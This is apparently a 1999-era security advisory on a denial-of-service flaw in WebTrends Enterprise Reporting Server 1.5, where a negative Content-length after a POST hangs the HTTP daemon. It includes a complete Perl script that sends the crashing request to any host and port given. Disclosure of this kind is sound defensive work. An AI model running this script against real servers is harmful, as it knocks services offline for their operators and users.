COMMAND

    WebTrends Enterprise Reporting Server

SYSTEMS AFFECTED

    Those using WebTrends Enterprise Reporting Server

PROBLEM

    rpc  found  following.   WebTrends  Enterprise  Reporting   Server
    version 1.5 (Linux/Solaris) is  vulnerable to a denial  of service
    attack  utilizing  the  Content-length  field  passed  to the HTTP
    daemon.   If a  negative Content-length  is passed  to the  daemon
    after  a  POST  method  has  been  called,  the  server  will stop
    responding.  WebTrends has been notified and a patch is supposedly
    in  the  works.   Below  is  an  example script to demonstrate the
    problem.

        Version: 1.5 (1.5a has not been tested)
        OS: Linux 2.2.x and Solaris (v?)
        License: Full

    Code follows:

    #!/usr/bin/perl -w
    # Example DoS against WebTrends Enterprise Reporting Server
    # 8/8/99
    # rpc <jared@antisocial.com>

    use IO::Socket;

    die "usage: $0 <host> <port>" unless (@ARGV == 2);

    ($host, $port) = @ARGV;


    $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp')
    or die "Can't create socket.";

    print $s "POST /\r\n";
    print $s "Content-type: text/plain\r\n";
    print $s "Content-length: -1", "\r\n"x5;

    print "done.\n";

SOLUTION

    Nothing yet.